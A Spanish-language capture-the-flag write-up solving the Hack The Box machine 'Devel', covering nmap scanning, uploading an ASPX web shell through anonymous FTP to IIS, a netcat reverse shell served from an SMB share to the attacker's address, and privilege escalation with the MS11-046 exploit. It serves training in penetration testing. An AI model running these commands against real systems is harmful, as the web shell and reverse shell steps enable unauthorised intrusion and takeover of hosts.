Devel

En este post, abordaremos la resolución de la máquina Devel de la plataforma Hack The Box. Primero, aprovecharemos el servicio FTP para conectarnos como el usuario anonymous y subir una web shell al servidor IIS. Luego, ejecutaremos una reverse shell con Netcat para obtener acceso al sistema. Finalmente, para escalar nuestros privilegios, utilizaremos la herramienta Windows Exploit Suggester, con la cual identificaremos una vía potencial para escalar nuestros privilegios.

Reconocimiento

Iniciamos como siempre, lanzando una traza ICMP a la máquina objetivo para comprobar que tengamos conectividad.

Reconocimiento usando el comando ping

Vemos que responde al envío de nuestro paquete, verificando de esta manera que tenemos conectividad. Por otra parte, confirmamos que estamos frente a una máquina Windows basandonos en el TTL (Time To Live) 127.

Descubrimiento de puertos abiertos

Realizamos un escaneo con nmap para descubrir que puertos TCP se encuentran abiertos en la máquina víctima.

nmap -sS -p- --open --min-rate 5000 10.10.10.5 -n -Pn -oG scanPorts -vvv

Descubrimiento de puertos abiertos

Enumeración de versión y servicio

Lanzamos una serie de script básicos de enumeración propios de nmap, para conocer la versión y servicio que esta corriendo bajo los puertos abiertos.

nmap -sCV -p21,80 10.10.10.5 -oN targeted -vvv

Descubrimiento de versión y servicio con nmap

Explotación

Usuario iis apppool\web

Como observamos en el escaneo realizado por la herramienta nmap, podemos conectarnos al servicio FTP como el usuarioi anonymous.

servicio ftp - usuario anonymous

Si ingresamos a la web que esta corriendo bajo el puerto 80, nos encontramos con una instancia de IIS 7. Al parecer, estos documentos que vemos al conectarnos por FTP, pertencen a la instancia actual del servidor web IIS.

IIS 7

iisstart.html

Subimos una web shell hecha en ASP, ya que el servicio IIS soporta de forma nativa este lenguaje de programación.

La web shell que utilizaré es la cmdasp.aspx.

Carga de web shell al servidor

PoC

Genial, tenemos capacidad de ejecución de comandos.

Para ganar acceso al sistema, nos enviaremos una reverse shell utilizando netcat. Para lo cual debemos contar con el binario de nc.exe.

Creamos un recurso compartido utilizando impacket-smbserver:

impacket-smbserver -smb2support sharedFolder .

SMB Server

Luego, nos ponemos en escucha con nc por el puerto 443.

rlwrap nc -lnvp 443

Por ultimo, ejecutamos el siguiente comando en nuestra web shell:

\\10.10.14.2\sharedFolder\nc.exe -e cmd 10.10.14.2 443

De esta forma, ganamos acceso al sistema como el usuario iis apppool\web.

Ganamos acceso al sistema como el usuario iis apppool\web.

Escalación de privilegios

Para escalar nuestros privilegios, utilizamos Windows Exploit Suggester.

En primer lugar, debemos guardar el resultado de la ejecución del comando systeminfo en un archivo, por ejemplo: systeminfo.txt.

Luego, debemos ejecutar el siguiente comando:

python3 wes.py -e systeminfo.txt -i 'Elevation of Privilege'

El resultado de este script, nos revelara posibles formas de elevar nuestros privilegios, filtrando por aquellos que cuenten con un exploit público.

Windows Exploit Suggester

En este caso, vamos a explotar la vulnerabilidad Microsoft Windows (x86)–'afd.sys'(MS11-046). Para lo cual, utilizaremos este exploit:

Nuevamente, vamos a hacer uso del recurso compartido por smb.

impacket-smbserver -smb2support sharedFolder .

Descargamos el binario en la máquina víctima y lo ejecutamos:

Escalación de privilegios

De esta forma, logramos escalar nuestros privilegios.

Por ultimo, leemos los flags de user.txt y root.txt.

Flags

De esta manera, concluimos la resolución de la máquina Devel.

Espero que los conceptos hayan quedado claros y hayas disfrutado del contenido.

¡Gracias por leer!

Happy Hacking!